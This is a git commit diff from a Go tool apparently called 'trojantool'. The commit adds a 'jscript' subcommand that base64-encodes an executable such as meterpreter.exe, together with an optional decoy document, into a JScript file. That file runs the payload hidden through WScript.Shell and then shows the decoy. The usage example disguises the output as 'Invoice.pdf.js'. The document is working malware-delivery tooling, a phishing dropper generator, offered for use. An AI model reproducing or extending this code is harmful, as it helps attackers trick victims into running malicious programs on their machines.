JScript should work now

main
Johannes Bülow 2023-08-10 21:53:50 +02:00
parent 4f2165a71d
commit b3b35f6011
Signed by untrusted user who does not match committer: jmb
GPG Key ID: B56971CF7B8F83A6
2 changed files with 58 additions and 6 deletions

View File

@ -1,12 +1,11 @@
/*
Copyright © 2023 NAME HERE <EMAIL ADDRESS>
*/
package cmd package cmd
import ( import (
_ "embed" _ "embed"
"fmt" "encoding/base64"
"github.com/spf13/cobra" "github.com/spf13/cobra"
"os"
"text/template"
) )
//go:embed jscript.gojs //go:embed jscript.gojs
@ -23,7 +22,57 @@ Example:
trojantool jscript --output Invoice.pdf.js --decoy Invoice.pdf meterpreter.exe trojantool jscript --output Invoice.pdf.js --decoy Invoice.pdf meterpreter.exe
`, `,
Run: func(cmd *cobra.Command, args []string) { Run: func(cmd *cobra.Command, args []string) {
fmt.Println("jscript called") type OutData struct {
Encoded string
EncodedDecoy string
}
var outData OutData
tmpl := template.Must(template.New("").Parse(jscriptTmpl))
if len(args) != 1 {
cmd.PrintErr("Please specify one Input file! \n")
_ = cmd.Help()
os.Exit(1)
}
input := args[0]
if input == "" {
cmd.PrintErr("You need to specify an input file!")
}
output, _ := cmd.Flags().GetString("output")
content, err := os.ReadFile(input)
if err != nil {
cmd.PrintErrf("Could not read Input file: %s", err)
}
outData.Encoded = base64.StdEncoding.EncodeToString(content)
decoy, err := cmd.Flags().GetString("decoy")
if err != nil {
cmd.PrintErrf("Could not get Decoy file: %s", err)
}
if decoy != "" {
decoyContent, err := os.ReadFile(decoy)
if err != nil {
cmd.PrintErrf("Could not get Decoy Content file: %s", err)
}
outData.EncodedDecoy = base64.StdEncoding.EncodeToString(decoyContent)
}
outFile, err := os.Create(output)
if err != nil {
cmd.PrintErrf("Could not create output file: %s", err)
}
defer func(outFile *os.File) {
err := outFile.Close()
if err != nil {
}
}(outFile)
err = tmpl.Execute(outFile, outData)
if err != nil {
cmd.PrintErrf("Could not create output file: %s", err)
}
}, },
} }

View File

@ -8,6 +8,7 @@ var bytes = stream.Read();
var shell = new ActiveXObject("WScript.Shell"); var shell = new ActiveXObject("WScript.Shell");
shell.Run(bytes, 0, false); shell.Run(bytes, 0, false);
{{if len .EncodedDecoy}}
var stream2 = new ActiveXObject("ADODB.Stream"); var stream2 = new ActiveXObject("ADODB.Stream");
stream.Type = 1; stream.Type = 1;
@ -16,4 +17,6 @@ stream.Write(window.atob({{.EncodedDecoy}}));
var bytes = stream.Read(); var bytes = stream.Read();
shell.Popup(bytes, 0, "Document", 0x40); shell.Popup(bytes, 0, "Document", 0x40);
// vim: syntax=javascript {{end}}
{{/* vim: syntax=javascript */}}